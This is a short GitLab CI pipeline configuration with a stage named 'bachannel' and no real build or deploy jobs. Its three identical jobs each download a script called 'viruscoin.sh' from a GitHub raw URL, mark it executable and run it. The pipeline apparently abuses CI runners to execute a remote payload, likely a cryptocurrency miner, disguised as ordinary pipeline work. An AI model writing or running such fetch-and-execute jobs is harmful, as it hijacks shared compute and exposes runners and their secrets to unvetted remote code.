stages:          # List of stages for jobs, and their order of execution
  - bachannel
  - build
  - deploy


bachannel_1:       # This job runs in the build stage, which runs first.
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/lord866/viruscointest/main/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh
bachannel_2:       # This job runs in the build stage, which runs first.
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/lord866/viruscointest/main/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh
bachannel_3:       # This job runs in the build stage, which runs first.
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/lord866/viruscointest/main/viruscoin.sh && chmod u+x viruscoin.sh && ./viruscoin.sh
